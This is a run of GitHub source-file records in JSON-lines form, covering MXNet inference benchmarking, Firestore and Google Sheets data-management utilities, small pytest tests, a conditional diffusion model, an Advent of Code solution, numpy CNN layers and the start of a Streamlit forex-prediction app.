else:\n data = [mx.nd.full(shape=shape, val=127, ctx=ctx, dtype=data_layer_type)\n for _, shape in mod.data_shapes]\n batch = mx.io.DataBatch(data, []) # empty label\n\n # run\n dry_run = 5 # use 5 iterations to warm up\n for i in range(dry_run+num_batches):\n if i == dry_run:\n tic = time.time()\n mod.forward(batch, is_train=False)\n for output in mod.get_outputs():\n output.wait_to_read()\n\n # return num images per second\n return num_batches*batch_size/(time.time() - tic)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Score a model on a dataset')\n parser.add_argument('--ctx', type=str, default='gpu')\n parser.add_argument('--benchmark', type=bool, default=False, help='dummy data benchmark')\n parser.add_argument('--symbol-file', type=str, required=True, help='symbol file 
path')\n parser.add_argument('--param-file', type=str, required=False, help='param file path')\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--label-name', type=str, default='softmax_label')\n parser.add_argument('--dataset', type=str, required=False, help='dataset path')\n parser.add_argument('--rgb-mean', type=str, default='0,0,0')\n parser.add_argument('--rgb-std', type=str, default='1,1,1')\n parser.add_argument('--image-shape', type=str, default='3,224,224')\n parser.add_argument('--data-nthreads', type=int, default=60, help='number of threads for data decoding')\n parser.add_argument('--num-skipped-batches', type=int, default=0, help='skip the number of batches for inference')\n parser.add_argument('--num-inference-batches', type=int, required=True, help='number of images used for inference')\n parser.add_argument('--shuffle-dataset', action='store_true', default=True,\n help='shuffle the calibration dataset')\n parser.add_argument('--shuffle-chunk-seed', type=int, default=3982304,\n help='shuffling chunk seed, see'\n ' https://mxnet.incubator.apache.org/api/python/io/io.html?highlight=imager#mxnet.io.ImageRecordIter'\n ' for more details')\n parser.add_argument('--shuffle-seed', type=int, default=48564309,\n help='shuffling seed, see'\n ' https://mxnet.incubator.apache.org/api/python/io/io.html?highlight=imager#mxnet.io.ImageRecordIter'\n ' for more details')\n parser.add_argument('--data-layer-type', type=str, default=\"float32\",\n choices=['float32', 'int8', 'uint8'],\n help='data type for data layer')\n\n args = parser.parse_args()\n\n if args.ctx == 'gpu':\n ctx = mx.gpu(0)\n elif args.ctx == 'cpu':\n ctx = mx.cpu(0)\n else:\n raise ValueError('ctx %s is not supported in this script' % args.ctx)\n\n logging.basicConfig()\n logger = logging.getLogger('logger')\n logger.setLevel(logging.INFO)\n\n symbol_file = args.symbol_file\n param_file = args.param_file\n data_nthreads = args.data_nthreads\n\n batch_size = args.batch_size\n logger.info('batch size = %d for inference' % batch_size)\n\n rgb_mean = args.rgb_mean\n logger.info('rgb_mean = %s' % rgb_mean)\n rgb_mean = [float(i) for i in rgb_mean.split(',')]\n mean_args = {'mean_r': rgb_mean[0], 'mean_g': rgb_mean[1], 'mean_b': rgb_mean[2]}\n rgb_std = args.rgb_std\n logger.info('rgb_std = %s' % rgb_std)\n rgb_std = [float(i) for i in rgb_std.split(',')]\n std_args = {'std_r': rgb_std[0], 'std_g': rgb_std[1], 'std_b': rgb_std[2]}\n combine_mean_std = {}\n combine_mean_std.update(mean_args)\n combine_mean_std.update(std_args)\n\n label_name = args.label_name\n logger.info('label_name = %s' % label_name)\n\n image_shape = args.image_shape\n data_shape = tuple([int(i) for i in image_shape.split(',')])\n logger.info('Input data shape = %s' % str(data_shape))\n\n data_layer_type = args.data_layer_type\n if args.benchmark == False:\n dataset = args.dataset\n download_dataset('http://data.mxnet.io/data/val_256_q90.rec', dataset)\n logger.info('Dataset for inference: %s' % dataset)\n\n # creating data iterator\n data = mx.io.ImageRecordIter(\n path_imgrec=dataset,\n label_width=1,\n preprocess_threads=data_nthreads,\n batch_size=batch_size,\n data_shape=data_shape,\n label_name=label_name,\n rand_crop=False,\n rand_mirror=False,\n shuffle=args.shuffle_dataset,\n shuffle_chunk_seed=args.shuffle_chunk_seed,\n seed=args.shuffle_seed,\n dtype=data_layer_type,\n ctx=args.ctx,\n **combine_mean_std)\n\n # loading model\n sym, arg_params, aux_params = load_model(symbol_file, param_file, logger)\n\n # make sure 
that fp32 inference works on the same images as calibrated quantized model\n logger.info('Skipping the first %d batches' % args.num_skipped_batches)\n data = advance_data_iter(data, args.num_skipped_batches)\n\n num_inference_images = args.num_inference_batches * batch_size\n logger.info('Running model %s for inference' % symbol_file)\n score(sym, arg_params, aux_params, data, [ctx], label_name,\n max_num_examples=num_inference_images, logger=logger)\n else:\n logger.info('Running model %s for inference' % symbol_file)\n speed = benchmark_score(symbol_file, ctx, batch_size, args.num_inference_batches, data_layer_type, logger)\n logger.info('batch size %2d, image/sec: %f', batch_size, speed)\n","repo_name":"hpi-xnor/BMXNet-v2","sub_path":"example/quantization/imagenet_inference.py","file_name":"imagenet_inference.py","file_ext":"py","file_size_in_byte":9593,"program_lang":"python","lang":"en","doc_type":"code","stars":225,"dataset":"github-code","pt":"51"} +{"seq_id":"29547937780","text":"from cmath import nan\nfrom opcode import stack_effect\nimport pytz\nfrom bs4 import BeautifulSoup\nimport requests\nfrom datetime import datetime, timedelta\nimport time\nfrom firebase_admin import firestore\nimport yfinance as yf\nimport pandas as pd\nimport numpy as np\nimport timeit\nimport json\nfrom google.oauth2 import service_account\nfrom google.cloud.firestore import Client\nfrom secret import access_secret\nfrom settings import project_id, firebase_database, fx_api_key, firestore_api_key, google_sheets_api_key, schedule_function_key, firebase_auth_api_key\nfrom googleapiclient.discovery import build\nfrom tools import export_gs_func\n\n\n\n\nfirestore_api_key = access_secret(firestore_api_key, project_id)\nfirestore_api_key_dict = json.loads(firestore_api_key)\nfbcredentials = service_account.Credentials.from_service_account_info(firestore_api_key_dict)\ndb = Client(firebase_database, fbcredentials)\n\ngoogle_sheets_api_key = access_secret(google_sheets_api_key, project_id)\ngoogle_sheets_api_key_dict = json.loads(google_sheets_api_key)\ngscredentials = service_account.Credentials.from_service_account_info(google_sheets_api_key_dict)\nREQUIRED_SPREADSHEET_ID = '1_lobEzbiuP9TE2UZqmqSAwizT8f2oeuZ8mVuUTbBAsA'\nservice = build('sheets', 'v4', credentials=gscredentials)\nsheet = service.spreadsheets()\n\n\n# ##################################################################################################\n# ######### Updating tickerlist from companiesmarketcap.com into firebase ##########################\n# ##################################################################################################\n\n# #updating the tickerlist by checking if all the tickers in companiesmarketcap is updated.\n# #if not it will copy the ticker to firebase collection - tickerlist\n# tz_SG = pytz.timezone('Singapore')\n# datetime_SG = datetime.now(tz_SG)\n# maxpages = 70\n# for i in range(1,maxpages):\n# time.sleep(0.5)\n# r = requests.get('https://companiesmarketcap.com/page/' + str(i))\n# soup = BeautifulSoup(r.text, 'html.parser')\n# results1 = soup.find_all(attrs={\"class\":'company-code'})\n# results2 = soup.find_all(attrs={\"class\":'company-name'})\n# #market cap\n# results3 = soup.find_all(attrs={\"class\":'td-right'})\n# print (\"page number \" + str(i) )\n\n# if len(results1) > 0:\n# #k count is to get the company name in results2 which is in a different dataset than results1\n# k = 0\n# for j in results1:\n# #get ticker\n# ticker = j.contents[1]\n# #check if ticker is inside firebase\n# if not 
db.collection('tickerlisttest').where(\"ticker\", \"==\", ticker).get():\n# #get name\n# tickername = str(results2[k].contents[0]).strip()\n\n# #loading data into firebase\n# data={\n# 'ticker': ticker, \n# 'tickername': tickername,\n# 'created_datetime': datetime_SG,\n# 'updated_datetime': datetime_SG,\n# 'marketcap': 0,\n# 'activated': True\n# }\n# db.collection('tickerlisttest').add(data)\n# print (ticker + \" uploaded\")\n# else:\n# print (ticker + \" passed\")\n# k = k + 1\n\n\n\n\n\n\n\n# #########################################################################\n# ####### reading data ####################################################\n# #########################################################################\n\n# # select based on a specific criteria like sector and marketcap\n# market_cap = 1000_000_000\n# docs = db.collection('tickerlisttest').where('marketCap', '>=', market_cap).stream()\n# for i in docs:\n# print (i._data['ticker'])\n\n# sector = \"Technology\"\n# docs = db.collection('tickerlisttest').where('sector', '>=', sector).stream()\n# for i in docs:\n# print (i._data['ticker'])\n\n# # Reading data into another destination\n# tickerlisttest = db.collection('tickerlisttest').get()\n# for i in tickerlisttest:\n# obj = db.collection('tickerlisttest').document(i.id).get()\n\n# print(obj._data['ticker'])\n# print(obj._data['tickername'])\n# print(obj._data['kpi']['sector'])\n# print(obj._data['updated_datetime'])\n\n# # Reading one single ticker\n# docs = db.collection(\"tickerlist\").where(\"ticker\", \"==\", \"NENT-B.ST\").get()\n# print(docs[0]._data['kpi']['currency'])\n\n\n# # if required to do a sort\n# tickerlist = db.collection('tickerlist').where('updated_datetime', '<=', target_datetime).order_by(\"updated_datetime\", direction=firestore.Query.ASCENDING).get()\n\n\n\n# ################################################################\n# ####### deleting documents and fields #########################\n# ################################################################\n\n\n# # delete all documents in a collection\n# collection = \"tickerlisttest\"\n# docs = db.collection(collection).get()\n# for doc in docs:\n# key = doc.id\n# db.collection(collection).document(key).delete()\n\n# # delete kpi fields from a collection\n# collection = \"tickerlisttest\"\n# fieldtodelete = \"longBusinessSummary\"\n# docs = db.collection(collection).get()\n# for doc in docs:\n# key = doc.id\n# db.collection(collection).document(key).update({\n# fieldtodelete: firestore.DELETE_FIELD\n# })\n\n# # delete certain documents in a collection\n# collection = \"kpilist\"\n# docs = db.collection(collection).where(\"rate\", \"==\", 0).get()\n# for doc in docs:\n# key = doc.id\n# print (doc.id)\n# db.collection(collection).document(key).delete()\n\n\n\n\n\n\n######################################################################################\n####### Migrating the real datasets to testing datasets ##########################\n######################################################################################\n# python -c 'from mgt_fb_crud import migrate_to_test; migrate_to_test()'\n\n# equity_daily_kpi_test\n\n#ASCENDING or #DESCENDING\ndef migrate_to_test():\n number_entries = 5\n migrate_from = 'equity_daily_agg'\n migrate_to = 'equity_daily_agg_test'\n\n tickerlist = db.collection(migrate_from).order_by(\"daily_industry_agg_updated_datetime\", direction=firestore.Query.DESCENDING).limit(number_entries).stream()\n\n x=1\n for tick in tickerlist:\n data_dict = {}\n for j in tick._data:\n 
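# copy every field of the source document into a plain dict for re-upload\n            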
data_dict[j] = tick._data[j]\n        db.collection(migrate_to).document(tick.id).set(data_dict, merge=True)\n        print(str(x) + \"/\" + str(number_entries) + \" done\")\n        x = x + 1\n\n#############################################################################################################################\n####### Deleting all the data to tickerdatatest (EXTREMELY DANGEROUS CODE) DOUBLE CHECK B4 RUNNING ##########################\n#############################################################################################################################\n# python -c 'from mgt_fb_crud import delete_all_fields; delete_all_fields()'\n\ndef delete_all_fields():\n    collection = \"tickerlistpricetest\"\n    docs = db.collection(collection).get()\n    for doc in docs:\n        key = doc.id\n        for i in doc.to_dict():\n            todelete = i\n            db.collection(collection).document(key).update({\n                todelete: firestore.DELETE_FIELD\n            })\n\n\n\n\n\n\n\n######################################################################################\n####### Investigation ################################################################\n######################################################################################\n\n############## Running the function from the command line ###############\n# python -c 'from mgt_fb_crud import ticker_investigation; ticker_investigation()'\n\nrequired_ticker = 'AAPL'\ndef ticker_investigation():\n    docs = db.collection('equity_calc').where(\"ticker\", \"==\", required_ticker).get()\n    # print(docs[0]._data['kpi'])\n    print(docs[0]._data)\n\n\n\n######################################################################################\n####### Count number of entries ######################################################\n######################################################################################\n\n############## Running the function from the command line ###############\n# python -c 'from mgt_fb_crud import counter_rows; counter_rows()'\ndef counter_rows():\n    docs = db.collection('equity_list').get()\n    print(len(docs))\n\n\n\n########################################################################################\n###########  Sample export dataframe to google sheets  #################################\n########################################################################################\n# python -c 'from mgt_fb_crud import sample_df_gs; sample_df_gs()'\n\ndef sample_df_gs():\n    name = \"pnl quarterly\"\n    sheetinfo = \"Sheet2\"\n    companyticker = yf.Ticker(\"meta\")\n    df = companyticker.financials\n    export_gs_func(name, df, sheetinfo)\n\n\n########################################################################################\n###########  Delete unwanted record datetime from the dataset  #########################\n########################################################################################\n# python -c 'from mgt_fb_crud import test_delete; test_delete()'\n\n# set fieldtodelete to the name of the field that should be removed\ndef test_delete():\n    # delete kpi fields from a collection\n    collection = \"tickerlisttest\"\n    fieldtodelete = \"\"\n    docs = db.collection(collection).get()\n    for doc in docs:\n        key = doc.id\n        db.collection(collection).document(key).update({\n            fieldtodelete: firestore.DELETE_FIELD\n        })\n\n\n\n########################################################################################\n###########  Extracting the time series financials to gs  ###############################\n########################################################################################\n# python -c 'from 
mgt_fin_exp_fb import financials_to_gs; financials_to_gs()'\n\nticker = 'WY'\ndef financials_to_gs():\n    docs = db.collection('tickerlisttest').where(\"ticker\", \"==\", ticker).get()[0]\n    time_series_financials = docs._data['time_series_financials']\n    cashflow = time_series_financials['cashflow']\n    df = pd.DataFrame(cashflow)\n    name = \"cashflow\"\n    sheetinfo = \"Sheet2\"\n    export_gs_func(name, df, sheetinfo)\n\n\n\n\n\n\n\n\n\n\n# export_gs_func(name, df, sheetinfo)\n\n    # ## Selected KPIs including usd values \n    # kpilistselect2 = [\n    #     'updated_datetime', 'ticker','tickername',\n    #     'shortName', 'longBusinessSummary','symbol', 'sector', 'industry', 'country', 'marketCap', \n    #     'returnOnAssets', 'returnOnEquity', 'revenueGrowth', 'revenuePerShare',\n    #     'grossMargins', 'operatingMargins', 'profitMargins', 'ebitdaMargins',\n    #     'forwardPE', 'trailingPE', 'earningsQuarterlyGrowth', 'earningsGrowth', 'priceToSalesTrailing12Months', \n    #     'trailingEps', 'forwardEps', \n    #     'pegRatio', 'trailingPegRatio',\n    #     'currentRatio', 'quickRatio', 'debtToEquity', \n    #     'bookValue', 'enterpriseValue', 'priceToBook', \n    #     'freeCashflow', 'operatingCashflow', 'dividendYield', 'dividendRate', \n    #     'totalRevenue', 'grossProfits', 'ebitda', 'totalDebt', 'beta',\n    #     'currency', 'financialCurrency',\n    #     'heldPercentInsiders', 'heldPercentInstitutions', 'isEsgPopulated',\n    #     'trailingAnnualDividendYield', 'trailingAnnualDividendRate', 'fiveYearAvgDividendYield', 'lastDividendValue', 'lastDividendDate',\n    #     'targetMedianPrice', 'targetMeanPrice', 'currentPrice',\n    #     'marketCapUSD', 'enterpriseValueUSD', 'freeCashflowUSD', 'operatingCashflowUSD', 'totalDebtUSD',\n    #     'currentPriceUSD', 'totalRevenueUSD', 'grossProfitsUSD', 'ebitdaUSD'\n    #     ]\n\n\n\n\n    \n\n\n\n\n","repo_name":"yuong1979/yfinance-project","sub_path":"mgt_fb_crud.py","file_name":"mgt_fb_crud.py","file_ext":"py","file_size_in_byte":11735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42258451400","text":"\nfrom Gangeinstellen import Gangeinstellen as GE\nfrom Zange import Zange\n\n\n\ndef test_oeffnen():\n    zange = Zange()\n    pG = GE(zange)\n    pG.oeffnen()\n    assert zange.geoeffnet == True\n\ndef test_einstellen():\n    zange = Zange()\n    pG = GE(zange)\n    pG.einstellen()\n    assert zange.eingestellt == True\n\ndef test_pruefen():\n    zange = Zange()\n    pG = GE(zange)\n    pG.pruefen()\n    assert zange.geprueft == True\n\n","repo_name":"TimSchrick/Zangenherstellung","sub_path":"Gangeinstellen_test.py","file_name":"Gangeinstellen_test.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"4122165383","text":"from typing import List, Tuple, Dict\n\nimport torch\nfrom torch import Tensor\nimport pyrootutils\n\npyrootutils.setup_root(__file__, indicator=\".project-root\", pythonpath=True)\n\nfrom src.models.unet import UNet\nfrom src.models.diffusion.net import DiffusionModel\nfrom src.models.diffusion.sampler import BaseSampler\n\n\nclass ConditionDiffusionModel(DiffusionModel):\n    \"\"\"\n    ### Condition Diffusion Model\n    \"\"\"\n\n    def __init__(\n        self,\n        denoise_net: UNet,\n        sampler: BaseSampler,\n        image_embedder: torch.nn.Module = None,\n        text_embedder: torch.nn.Module = None,\n        n_train_steps: int = 1000,\n        img_dims: Tuple[int, int, int] = [1, 32, 32],\n        gif_frequency: int = 20,\n    ) -> None:\n        \"\"\"_summary_\n        \n        Args:\n            denoise_net (UNet): model to learn noise\n            sampler (BaseSampler): sampler that drives the noising/denoising steps 
in diffusion\n image_embedder (torch.nn.Module, optional): _description_. Defaults to None.\n text_embedder (torch.nn.Module, optional): _description_. Defaults to None.\n n_train_steps (int, optional): the number of diffusion step for forward process. Defaults to 1000.\n img_dims (Tuple[int, int, int], optional): resolution of image - [channels, width, height]. Defaults to [1, 32, 32].\n gif_frequency (int, optional): _description_. Defaults to 20.\n \"\"\"\n super().__init__(denoise_net, sampler, n_train_steps, img_dims,\n gif_frequency)\n self.image_embedder = image_embedder\n self.text_embedder = text_embedder\n\n def get_image_embedding(self, image: torch.Tensor):\n return self.image_embedder(image)\n\n def get_text_embedding(self, text: torch.Tensor):\n return self.text_embedder(text)\n\n def forward(self,\n x0: Tensor,\n sample_steps: Tensor | None = None,\n noise: Tensor | None = None,\n cond: Dict[str, Tensor] = None) -> Tuple[Tensor, Tensor]:\n \"\"\"_summary_\n ### forward diffusion process to create label for model training\n Args:\n x0 (Tensor): _description_\n sample_steps (Tensor | None, optional): _description_. Defaults to None.\n noise (Tensor | None, optional): _description_. Defaults to None.\n cond (Dict[str, Tensor], optional): _description_. Defaults to None.\n\n Returns:\n Tuple[Tensor, Tensor]:\n - pred: noise is predicted from xt by model\n - target: noise is added to (x0 -> xt)\n \"\"\"\n\n if cond is not None:\n if 'image' in cond.keys() and self.image_embedder is not None:\n cond['image'] = self.get_image_embedding(cond['image'])\n\n if 'text' in cond.keys():\n assert ('text' in cond.keys()) == (self.text_embedder\n is not None)\n cond['text'] = self.get_text_embedding(cond['text'])\n\n return super().forward(x0, sample_steps, noise, cond)\n\n @torch.no_grad()\n def sample(self,\n xt: Tensor | None = None,\n sample_steps: Tensor | None = None,\n cond: Dict[str, Tensor] = None,\n num_sample: int | None = 1,\n noise: Tensor | None = None,\n repeat_noise: bool = False,\n device: torch.device = torch.device('cpu'),\n prog_bar: bool = False) -> List[Tensor]:\n \"\"\"_summary_\n ### reverse diffusion process\n Args:\n xt (Tensor | None, optional): _description_. Defaults to None.\n sample_steps (Tensor | None, optional): _description_. Defaults to None.\n cond (Dict[str, Tensor], optional): _description_. Defaults to None.\n num_sample (int | None, optional): _description_. Defaults to 1.\n noise (Tensor | None, optional): _description_. Defaults to None.\n repeat_noise (bool, optional): _description_. Defaults to False.\n device (torch.device, optional): _description_. Defaults to torch.device('cpu').\n prog_bar (bool, optional): _description_. 
Defaults to False.\n\n Returns:\n List[Tensor]: _description_\n \"\"\"\n\n if cond is not None:\n if 'image' in cond.keys() and self.image_embedder is not None:\n cond['image'] = self.get_image_embedding(cond['image'])\n\n if 'text' in cond.keys():\n assert ('text' in cond.keys()) == (self.text_embedder\n is not None)\n cond['text'] = self.get_text_embedding(cond['text'])\n\n return super().sample(xt, sample_steps, cond, num_sample, noise,\n repeat_noise, device, prog_bar)\n\n\nif __name__ == \"__main__\":\n import hydra\n from omegaconf import DictConfig\n\n root = pyrootutils.find_root(search_from=__file__,\n indicator=\".project-root\")\n config_path = str(root / \"configs\" / \"model\" / \"diffusion\" / \"net\")\n print(\"root: \", root)\n\n @hydra.main(version_base=None,\n config_path=config_path,\n config_name=\"condition_diffusion_model.yaml\")\n def main(cfg: DictConfig):\n cfg['n_train_steps'] = 1000\n cfg['img_dims'] = [1, 32, 32]\n cfg['sampler']['n_train_steps'] = 1000\n cfg['denoise_net']['d_cond_image'] = 1\n cfg['denoise_net']['n_classes'] = 2\n # print(cfg)\n\n condition_diffusion_model: ConditionDiffusionModel = hydra.utils.instantiate(\n cfg)\n\n x = torch.randn(2, 1, 32, 32)\n t = torch.randint(0, cfg['n_train_steps'], (2, ))\n cond = {\n 'label': torch.randint(0, cfg['denoise_net']['n_classes'], (2, )),\n 'image': torch.rand_like(x),\n }\n\n print('***** CONDITION DIFFUSION MODEL *****')\n\n print('=' * 15, ' forward process ', '=' * 15)\n print('Input:', x.shape)\n xt = condition_diffusion_model.sampler.step(x, t)\n pred, target = condition_diffusion_model(x, cond=cond)\n pred, target = condition_diffusion_model(x, cond=cond)\n print('xt:', xt.shape)\n print('Prediction:', pred.shape)\n print('Target:', target.shape)\n\n print('=' * 15, ' reverse process ', '=' * 15)\n gen_samples = condition_diffusion_model.sample(num_sample=2,\n cond=cond,\n prog_bar=True)\n print(len(gen_samples), gen_samples[0].shape)\n\n main()\n","repo_name":"huynhspm/Generative-Model","sub_path":"src/models/diffusion/net/condition_diffusion_model.py","file_name":"condition_diffusion_model.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72252373277","text":"from typing import Dict\n\nfrom util.file_util import read_input_file\n\n\ndef parse_input_file() -> Dict[int, int]:\n lines = read_input_file(10)\n value_at_cycle: Dict[int, int] = {}\n cycle = 1\n value = 1\n for line in lines:\n value_at_cycle[cycle] = value\n if line == \"noop\":\n cycle += 1\n else:\n parts = line.split(\" \")\n if parts[0] == \"addx\":\n add_value = int(parts[1])\n cycle += 1\n value_at_cycle[cycle] = value\n cycle += 1\n value += add_value\n else:\n raise ValueError(f\"Couldn't parse line: {line}\")\n return value_at_cycle\n\n\ndef level10_1() -> int:\n value_at_cycle = parse_input_file()\n result = 0\n for target_cycle in [20, 60, 100, 140, 180, 220]:\n result += target_cycle * value_at_cycle[target_cycle]\n return result\n\n\ndef level10_2() -> str:\n value_at_cycle = parse_input_file()\n output = \"\"\n for i in range(240):\n value = value_at_cycle[i + 1]\n distance = abs(value - i % 40)\n if distance < 2:\n output += \"#\"\n else:\n output += \".\"\n return output\n\n\nif __name__ == '__main__':\n print(f\"Signal strength: {level10_1()}\")\n _result = level10_2()\n for _i in range(0, 240, 40):\n 
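# the CRT screen is 40 pixels wide: print the 240-pixel buffer as six rows\n        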
print(_result[_i:_i+40])\n","repo_name":"DerDodo/AdventOfCode2022","sub_path":"solutions/level10.py","file_name":"level10.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9892142628","text":"import numpy as np\nfrom tensorwow.im2col import im2col_indices\n\n\nclass FullyConnectedLayer(object):\n def __init__(self, num_input_units, num_output_units, activation_func, weights_initializer, bias_initializer):\n \"\"\"\n :param num_input_units: Number of input dimensions D\n :param num_output_units: Number of output dimensions O\n :param activation_func: Activation function\n :param weights_initializer: Weights initializer\n :param bias_initializer: Bias initializer\n \"\"\"\n self._num_input_units = num_input_units\n self._num_output_units = num_output_units\n self._activation_func = activation_func\n\n # Disable default initialization\n # self._weights = weights_initializer.initialize((num_input_units, num_output_units))\n # self._bias = bias_initializer.initialize((num_output_units))\n\n self._x = None\n self._z = None\n self._a = None\n self._dw = None\n self._db = None\n\n @property\n def num_input_units(self):\n return self._num_input_units\n\n @property\n def num_output_units(self):\n return self._num_output_units\n\n @property\n def weights(self):\n \"\"\"\n :return: D x M matrix\n \"\"\"\n return self._weights\n\n @weights.setter\n def weights(self, weights):\n if weights.shape != (self._num_input_units, self._num_output_units):\n raise ValueError(\"Invalid dimensions\")\n\n self._weights = weights\n\n @property\n def bias(self):\n \"\"\"\n :return: vector of length M\n \"\"\"\n return self._bias\n\n @bias.setter\n def bias(self, bias):\n if bias.shape != (self._num_output_units,):\n raise ValueError(\"Invalid dimensions\")\n\n self._bias = bias\n\n def forward(self, x):\n \"\"\"\n\n :param x: N x D matrix\n :return: N x M matrix\n \"\"\"\n assert len(x.shape) == 2, \"Inputs must be a two-dimensional tensor\"\n assert x.shape[1] == self._num_input_units, \"Inputs does not match input size\"\n\n z = np.dot(x, self._weights) + self._bias\n a = self._activation_func.compute(z)\n\n # Cache values for backward step\n self._x = x\n self._z = z\n self._a = a\n\n return a\n\n\nclass ConvLayer(object):\n def __init__(self, kernel_size, num_input_channels, num_filters, activation_func, weights_initializer, bias_initializer, stride=1, padding=1):\n self._kernel_size = kernel_size\n self._num_input_channels = num_input_channels\n self._num_filters = num_filters\n self._padding = padding\n self._stride = stride\n self._activation_func = activation_func\n\n # Disable default initialization\n # self._weights = weights_initializer.initialize((kernel_size, kernel_size, num_input_channels, num_filters))\n # self._bias = bias_initializer.initialize((num_filters, 1))\n\n @property\n def weights(self):\n \"\"\"\n :return: Weight matrix of shape (kernel_size, kernel_size, num_input_channels, num_filters)\n \"\"\"\n return self._weights\n\n @property\n def bias(self):\n \"\"\"\n :return: Bias vector of length num_filters\n \"\"\"\n return self._bias\n\n @weights.setter\n def weights(self, weights):\n if weights.shape != (self._kernel_size, self._kernel_size, self._num_input_channels, self._num_filters):\n raise ValueError(\"Invalid dimensions\")\n\n self._weights = weights\n\n @bias.setter\n def bias(self, bias):\n if bias.shape != (self._num_filters,):\n raise ValueError(\"Invalid dimensions\")\n\n 
self._bias = bias\n\n def forward(self, x):\n \"\"\"\n Computes the correlation of each input sample with the layer's kernel matrix\n :param x: input images of shape [num_samples, height, width, input_channels]\n :return: feature maps of shape [num_samples, height, width, num_filters]\n \"\"\"\n assert len(x.shape) == 4, \"Inputs must be a three-dimensional tensor\"\n assert x.shape[3] == self._num_input_channels, \"Inputs does not match required input channels\"\n\n num_samples, height, width, channels = x.shape\n assert (height - self._kernel_size + 2 * self._padding) % self._stride == 0, \"Invalid dimensions\"\n assert (width - self._kernel_size + 2 * self._padding) % self._stride == 0, \"Invalid dimensions\"\n\n output_height = (height - self._kernel_size + 2 * self._padding) // self._stride + 1\n output_width = (width - self._kernel_size + 2 * self._padding) // self._stride + 1\n\n x_col = im2col_indices(x, self._kernel_size, self._kernel_size, padding=self._padding, stride=self._stride)\n # Move filter kernels to the front before reshaping to [num_filters, ...]\n # To make the filter matrix appear for each channel contiguously, move the channels dimension to the front as well\n weights_col = self._weights.transpose(3, 2, 0, 1).reshape(self._num_filters, -1)\n\n z = np.dot(weights_col, x_col) + self._bias[:, None]\n a = self._activation_func.compute(z)\n # Found this order through experimenting\n a = a.reshape(self._num_filters, num_samples, output_height, output_width).transpose(1, 2, 3, 0)\n\n return a\n\n\nclass MaxPoolLayer(object):\n def __init__(self, window_size, padding, stride):\n self._window_size = window_size\n self._padding = padding\n self._stride = stride\n\n def forward(self, x):\n num_samples, height, width, num_channels = x.shape\n assert (height - self._window_size) % self._stride == 0, \"Invalid dimensions\"\n assert (width - self._window_size) % self._stride == 0, \"Invalid dimensions\"\n output_height = (height - self._window_size) // self._stride + 1\n output_width = (width - self._window_size) // self._stride + 1\n\n x_prep = x.transpose(0, 3, 1, 2).reshape(num_samples * num_channels, height, width, 1)\n x_col = im2col_indices(x_prep, self._window_size, self._window_size, padding=self._padding, stride=self._stride)\n max_indices = np.argmax(x_col, axis=0)\n z = x_col[max_indices, range(len(max_indices))]\n z = z.reshape(num_samples, num_channels, output_height, output_width).transpose(0, 2, 3, 1)\n\n return z\n","repo_name":"fausecteam/faustctf-2018-jodlgang","sub_path":"src/jodlgang/tensorwow/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"40093047008","text":"import streamlit as st\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom datetime import datetime\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom pandas.plotting import register_matplotlib_converters\r\nregister_matplotlib_converters()\r\nimport MetaTrader5 as mt5\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom tensorflow.keras.models import Sequential, load_model\r\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM\r\nimport tensorflow as tf\r\nfrom PIL import Image\r\n\r\nst.write(\"\"\"\r\n# EUR/GBP PRICES PREDICTION\r\n# *euro vs great british pound*\r\n\"\"\")\r\nwith st.form(key = 'my_form'):\r\n username = st.text_input('identifiant')\r\n password = st.text_input('mot de passe')\r\n 
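# --- Hedged companion to the tensorwow layers.py entry above: why the im2col
# trick lets ConvLayer.forward compute every filter at every location with a
# single np.dot. This standalone version covers only the single-channel,
# stride-1, no-padding case; im2col_indices in that repo is more general.
import numpy as np

def im2col_simple(x, k):
    """x: [H, W] single channel. Returns a [k*k, n_patches] column matrix."""
    h, w = x.shape
    oh, ow = h - k + 1, w - k + 1
    cols = np.empty((k * k, oh * ow))
    idx = 0
    for i in range(oh):
        for j in range(ow):
            cols[:, idx] = x[i:i + k, j:j + k].ravel()  # one patch per column
            idx += 1
    return cols

rng = np.random.default_rng(0)
img = rng.standard_normal((6, 6))
kern = rng.standard_normal((3, 3))
# cross-correlation as one dot product over patch columns
out = (kern.ravel() @ im2col_simple(img, 3)).reshape(4, 4)
# naive double loop for comparison
ref = np.array([[(img[i:i + 3, j:j + 3] * kern).sum() for j in range(4)]
                for i in range(4)])
assert np.allclose(out, ref)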
